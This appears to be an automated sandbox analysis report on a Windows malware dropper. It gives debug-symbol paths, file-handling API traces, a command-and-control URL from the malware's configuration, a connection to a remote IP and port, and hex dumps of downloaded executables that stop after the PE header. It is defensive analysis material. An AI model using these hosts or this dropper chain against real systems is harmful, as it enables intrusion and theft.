                                Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942647828.00000173F45F0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1806205477.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806418493.000000000432D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806060081.0000000003B1A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054438772.0000000005560000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2053660650.000000000507F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047243980.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047475652.0000000004339000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2046349447.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204376532.0000000005071000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204654106.0000000005550000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: mozglue.pdb source: u42w.0.exe, 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000000.1746274601.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1804456398.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000000.1987893127.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000002.2045446560.000000000083C000.00000002.00000001.01000000.00000009.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959598733.00000173F5380000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938719141.00000173F2420000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1807890245.000000006C967000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000F.00000002.2048249667.000000006C1F7000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942501439.00000173F45E0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938776156.00000173F2430000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: FCBAECGIEB.exe, 00000016.00000002.2883604441.0000000000B1C000.00000002.00000001.01000000.00000018.sdmp, FCBAECGIEB.exe, 00000016.00000000.2059092931.0000000000B1C000.00000002.00000001.01000000.00000018.sdmp, tiktok[1].exe.1.dr
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942377464.00000173F45D0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938776156.00000173F2430000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942377464.00000173F45D0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1806205477.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806418493.000000000432D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806060081.0000000003B1A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054438772.0000000005560000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2053660650.000000000507F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047243980.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047475652.0000000004339000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2046349447.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204376532.0000000005071000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204654106.0000000005550000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959660867.00000173F5390000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2928112460.000001739001C000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: nss3.pdb source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00412570
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040D1C0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004015C0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00411650
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_0040B610 GetDateFormatA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0040B610
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040DB60
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00411B80
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D540
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_004121F0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_6C86261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,2_2_6C86261E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile opened: C:\Users\user\AppData\Local\Temp\u42w.2Jump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile opened: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeJump to behavior

                                Networking

                                barindex
                                Source: Malware configuration extractorURLs: 185.172.128.76/3cd2b41cbde8fc9c.php
                                Source: Malware configuration extractorURLs: http://185.172.128.76/3cd2b41cbde8fc9c.php
                                Source: global trafficTCP traffic: 91.215.85.66 ports 1,4,5,6,7,15647
                                Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4860000.13.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                Source: global trafficTCP traffic: 192.168.2.4:49756 -> 91.215.85.66:15647
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Apr 2024 07:03:57 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 25 Apr 2024 07:00:02 GMTETag: "44200-616e6560d4ed7"Accept-Ranges: bytesContent-Length: 279040Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 8e a8 0b d1 ef c6 58 d1 ef c6 58 d1 ef c6 58 cf bd 53 58 c0 ef c6 58 cf bd 45 58 b2 ef c6 58 cf bd 42 58 fb ef c6 58 f6 29 bd 58 d4 ef c6 58 d1 ef c7 58 bb ef c6 58 cf bd 4c 58 d0 ef c6 58 cf bd 52 58 d0 ef c6 58 cf bd 57 58 d0 ef c6 58 52 69 63 68 d1 ef c6 58 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a1 22 4f 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a8 00 00 00 16 82 02 00 00 00 00 4c 16 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 82 02 00 04 00 00 b1 d4 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 42 03 00 3c 00 00 00 00 80 81 02 68 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b3 a6 00 00 00 10 00 00 00 a8 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 dc 8a 02 00 00 c0 00 00 00 8c 02 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 22 7e 02 00 50 03 00 00 28 00 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 e0 00 00 00 80 81 02 00 e2 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 07:04:03 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 